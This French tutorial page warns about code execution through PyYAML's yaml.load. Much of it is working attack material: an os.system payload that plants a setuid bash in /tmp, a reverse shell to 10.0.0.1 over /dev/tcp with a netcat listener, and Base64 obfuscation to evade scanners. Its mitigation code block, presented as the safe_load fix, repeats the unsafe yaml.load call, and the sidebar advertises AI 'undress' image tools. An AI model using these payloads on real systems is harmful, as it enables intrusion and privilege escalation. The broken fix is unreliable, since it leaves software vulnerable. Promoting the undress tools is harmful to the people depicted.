Soyez prudent lorsque vous utilisez YAML en Python ! Il peut y avoir des failles de sécurité-Tutoriel Python-php.cn

Maison

développement back-end

Tutoriel Python

Soyez prudent lorsque vous utilisez YAML en Python ! Il peut y avoir des failles de sécurité

Patricia Arquette

Jan 03, 2025 pm 10:15 PM

Be Careful When Using YAML in Python! There May Be Security Vulnerabilities

La bibliothèque YAML (YAML Ain't Markup Language) en Python a été identifiée comme présentant des vulnérabilités qui permettent l'exécution de commandes arbitraires sous certaines conditions. La vulnérabilité résulte de l'utilisation de la fonction yaml.load sans spécifier de chargeur sécurisé. Par défaut, yaml.load peut exécuter des objets Python arbitraires, ce qui crée une surface d'attaque pour les charges utiles malveillantes.

Exploitation via l’exécution de commandes arbitraires

Le risque fondamental réside dans le processus de désérialisation. Lorsqu'un document YAML contient une charge utile malveillante, yaml.load traite les directives intégrées, conduisant potentiellement à l'exécution de code. Par exemple, considérons l'extrait suivant :

import yaml

filename = "example.yml"
data = open(filename, 'r').read()
yaml.load(data)  # Unsafe usage

Ici, la fonction yaml.load analyse example.yml sans restrictions, le rendant vulnérable si le contenu YAML inclut des directives non sécurisées. Une charge utile d'exploit typique peut être conçue pour exécuter des commandes système arbitraires.

Exemple de charge utile

import yaml
from yaml import Loader, UnsafeLoader

# Malicious payload
payload = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]'

# Exploitation
yaml.load(payload)
yaml.load(payload, Loader=Loader)
yaml.load(payload, Loader=UnsafeLoader)

Chacune de ces invocations traite la charge utile, entraînant la création d'un exécutable privilégié dans /tmp/bash. Ce binaire peut ensuite être exécuté avec des privilèges élevés :

/tmp/bash -p

Cela démontre le potentiel d'élévation des privilèges si la vulnérabilité est exploitée sur un système avec des autorisations mal configurées ou d'autres faiblesses.

Exploitation du shell inversé

Un cas d'utilisation particulièrement insidieux consiste à exploiter la vulnérabilité d'un shell inversé. Cela permet aux attaquants d’accéder à distance à la machine cible. Le processus consiste à démarrer un écouteur sur la machine de l'attaquant et à créer un document YAML conçu pour établir la connexion inverse.

Sur la machine de l'attaquant, lancez un écouteur Netcat :

nc -lvnp 1234

Sur le système cible, exécutez le script Python suivant en tant que root :

import yaml

# Reverse shell payload
data = '!!python/object/new:os.system ["bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\""]'
yaml.load(data)  # Executes the reverse shell

Cette charge utile demande à la machine cible de se reconnecter à l'écouteur de l'attaquant, fournissant ainsi un shell entièrement interactif avec les privilèges du processus d'exécution.

Encodage Base64 pour l’obscurcissement

Pour contourner les contrôles ou filtres de sécurité de base, la charge utile peut être codée en Base64. Cette méthode ajoute une couche d'obscurcissement, échappant potentiellement à la détection par les outils d'analyse statique.

Exemple

from base64 import b64decode
import yaml

# Base64-encoded payload
encoded_payload = b"ISFweXRa...YXNoIl0="  # Truncated for brevity
payload = b64decode(encoded_payload)

# Execute the payload
yaml.load(payload)

Techniques d'atténuation

Les professionnels doivent adopter des pratiques de codage strictes pour éliminer ces vulnérabilités. Les mesures d'atténuation recommandées incluent :

Utilisation de Safe Loaders : remplacez yaml.load par yaml.safe_load, qui empêche l'exécution d'objets arbitraires.
```
import yaml

filename = "example.yml"
data = open(filename, 'r').read()
yaml.load(data)  # Unsafe usage
```
Restriction des sources d'entrée : assurez-vous que les entrées YAML sont nettoyées et proviennent uniquement de sources fiables.
Application de l'analyse statique : utilisez des outils pour analyser les bases de code à la recherche d'invocations yaml.load dangereuses.
Durcissement de l'environnement : restreindre les autorisations du système pour minimiser l'impact de l'exploitation. Par exemple, l'utilisation d'environnements conteneurisés limite la capacité d'un attaquant à élever ses privilèges.

Le comportement par défaut de la bibliothèque YAML illustre les risques associés à la désérialisation dans les langages typés dynamiquement comme Python. L’exploitation de cette vulnérabilité nécessite une sophistication minimale, ce qui en fait un problème hautement prioritaire pour le développement d’applications sécurisées. Il est impératif d'adopter des pratiques de codage sûres, ainsi qu'une validation des entrées et des garanties d'exécution robustes, pour atténuer efficacement ces risques.

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Déclaration

Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn

Article connexe

Le but principal de Python: flexibilité et facilité d'utilisationApr 17, 2025 am 12:14 AM

La flexibilité de Python se reflète dans les systèmes de prise en charge et de type dynamique multi-paradigmes, tandis que la facilité d'utilisation provient d'une syntaxe simple et d'une bibliothèque standard riche. 1. Flexibilité: prend en charge la programmation orientée objet, fonctionnelle et procédurale, et les systèmes de type dynamique améliorent l'efficacité de développement. 2. Facilité d'utilisation: La grammaire est proche du langage naturel, la bibliothèque standard couvre un large éventail de fonctions et simplifie le processus de développement.

Python: la puissance de la programmation polyvalenteApr 17, 2025 am 12:09 AM

Python est très favorisé pour sa simplicité et son pouvoir, adaptés à tous les besoins des débutants aux développeurs avancés. Sa polyvalence se reflète dans: 1) Facile à apprendre et à utiliser, syntaxe simple; 2) Bibliothèques et cadres riches, tels que Numpy, Pandas, etc.; 3) Support multiplateforme, qui peut être exécuté sur une variété de systèmes d'exploitation; 4) Convient aux tâches de script et d'automatisation pour améliorer l'efficacité du travail.

Apprendre le python en 2 heures par jour: un guide pratiqueApr 17, 2025 am 12:05 AM

Oui, apprenez Python en deux heures par jour. 1. Élaborer un plan d'étude raisonnable, 2. Sélectionnez les bonnes ressources d'apprentissage, 3. Consolider les connaissances apprises par la pratique. Ces étapes peuvent vous aider à maîtriser Python en peu de temps.

Python vs C: avant et inconvénients pour les développeursApr 17, 2025 am 12:04 AM

Python convient au développement rapide et au traitement des données, tandis que C convient à des performances élevées et à un contrôle sous-jacent. 1) Python est facile à utiliser, avec syntaxe concise, et convient à la science des données et au développement Web. 2) C a des performances élevées et un contrôle précis, et est souvent utilisé dans les jeux et la programmation système.

Python: engagement du temps et rythme d'apprentissageApr 17, 2025 am 12:03 AM

Le temps nécessaire pour apprendre le python varie d'une personne à l'autre, principalement influencé par l'expérience de programmation précédente, la motivation d'apprentissage, les ressources et les méthodes d'apprentissage et le rythme d'apprentissage. Fixez des objectifs d'apprentissage réalistes et apprenez mieux à travers des projets pratiques.

Python: automatisation, script et gestion des tâchesApr 16, 2025 am 12:14 AM

Python excelle dans l'automatisation, les scripts et la gestion des tâches. 1) Automatisation: La sauvegarde du fichier est réalisée via des bibliothèques standard telles que le système d'exploitation et la fermeture. 2) Écriture de script: utilisez la bibliothèque PSUTIL pour surveiller les ressources système. 3) Gestion des tâches: utilisez la bibliothèque de planification pour planifier les tâches. La facilité d'utilisation de Python et la prise en charge de la bibliothèque riche en font l'outil préféré dans ces domaines.

Python et temps: tirer le meilleur parti de votre temps d'étudeApr 14, 2025 am 12:02 AM

Pour maximiser l'efficacité de l'apprentissage de Python dans un temps limité, vous pouvez utiliser les modules DateTime, Time et Schedule de Python. 1. Le module DateTime est utilisé pour enregistrer et planifier le temps d'apprentissage. 2. Le module de temps aide à définir l'étude et le temps de repos. 3. Le module de planification organise automatiquement des tâches d'apprentissage hebdomadaires.

Python: jeux, GUIS, et plusApr 13, 2025 am 12:14 AM

Python excelle dans les jeux et le développement de l'interface graphique. 1) Le développement de jeux utilise Pygame, fournissant des fonctions de dessin, audio et d'autres fonctions, qui conviennent à la création de jeux 2D. 2) Le développement de l'interface graphique peut choisir Tkinter ou Pyqt. Tkinter est simple et facile à utiliser, PYQT a des fonctions riches et convient au développement professionnel.

See all articles

Outils d'IA chauds

Undresser.AI Undress

Application basée sur l'IA pour créer des photos de nu réalistes

AI Clothes Remover

Outil d'IA en ligne pour supprimer les vêtements des photos.

Undress AI Tool

Images de déshabillage gratuites

Clothoff.io

Dissolvant de vêtements AI

AI Hentai Generator

Générez AI Hentai gratuitement.

Afficher plus

Article chaud

R.E.P.O. Crystals d'énergie expliqués et ce qu'ils font (cristal jaune)

1 Il y a quelques moisBy尊渡假赌尊渡假赌尊渡假赌

R.E.P.O. Meilleurs paramètres graphiques

1 Il y a quelques moisBy尊渡假赌尊渡假赌尊渡假赌

Assassin's Creed Shadows: Solution d'énigmes de coquille

2 Il y a quelques semainesByDDD

R.E.P.O. Comment réparer l'audio si vous n'entendez personne

1 Il y a quelques moisBy尊渡假赌尊渡假赌尊渡假赌

R.E.P.O. Commandes de chat et comment les utiliser

1 Il y a quelques moisBy尊渡假赌尊渡假赌尊渡假赌

Afficher plus

Outils chauds

mPDF

mPDF est une bibliothèque PHP qui peut générer des fichiers PDF à partir de HTML encodé en UTF-8. L'auteur original, Ian Back, a écrit mPDF pour générer des fichiers PDF « à la volée » depuis son site Web et gérer différentes langues. Il est plus lent et produit des fichiers plus volumineux lors de l'utilisation de polices Unicode que les scripts originaux comme HTML2FPDF, mais prend en charge les styles CSS, etc. et présente de nombreuses améliorations. Prend en charge presque toutes les langues, y compris RTL (arabe et hébreu) et CJK (chinois, japonais et coréen). Prend en charge les éléments imbriqués au niveau du bloc (tels que P, DIV),

Navigateur d'examen sécurisé

Safe Exam Browser est un environnement de navigation sécurisé permettant de passer des examens en ligne en toute sécurité. Ce logiciel transforme n'importe quel ordinateur en poste de travail sécurisé. Il contrôle l'accès à n'importe quel utilitaire et empêche les étudiants d'utiliser des ressources non autorisées.